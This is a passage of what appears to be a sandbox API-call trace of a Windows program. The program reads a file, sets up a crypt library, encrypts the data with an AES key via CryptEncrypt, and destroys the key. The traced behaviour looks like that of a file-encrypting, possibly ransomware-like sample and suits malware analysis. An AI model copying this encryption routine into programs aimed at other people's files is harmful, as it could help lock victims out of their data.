| out: lpMsg=0x87f36c) returned 0 [0168.402] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.402] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.402] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0168.402] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x4db6, lpOverlapped=0x0) returned 1 [0168.404] ReadFile (in: hFile=0x120, lpBuffer=0xa6b008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa6b008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0168.405] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.405] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.405] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.405] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0168.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.405] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.405] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0168.405] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.405] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0168.406] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.406] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.406] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.406] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0168.406] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.406] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2808, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2808*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0168.406] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.406] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.407] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0168.407] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.407] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0168.407] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.407] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.407] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.408] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.408] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.408] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x4db6, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x4dc0) returned 1 [0168.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0168.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0168.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0168.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0168.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0168.408] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0168.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.408] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.408] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0168.409] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.409] CharLowerBuffW (in: lpsz="byte[19905]", cchLength=0xb | out: lpsz="byte[19905]") returned 0xb [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0168.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0168.409] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0168.410] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.410] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.410] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0168.411] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0168.411] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa84b90*, pdwDataLen=0x87e820*=0x4db6, dwBufLen=0x4dc0 | out: pbData=0xa84b90*, pdwDataLen=0x87e820*=0x4dc0) returned 1 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0168.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0168.411] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0168.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0168.412] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0168.412] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0168.412] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0168.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.413] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0168.413] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.413] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0168.413] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0168.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.413] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0168.413] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0168.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0168.413] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.413] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0168.413] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0168.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0168.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0168.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.415] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0168.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0168.415] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.415] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0168.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.418] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.418] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0168.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0168.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.418] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0168.418] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0168.419] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.419] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0168.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0168.419] CryptDestroyKey (hKey=0x90af98) returned 1 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0168.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0168.420] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0168.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0168.420] RtlAllocateHeap 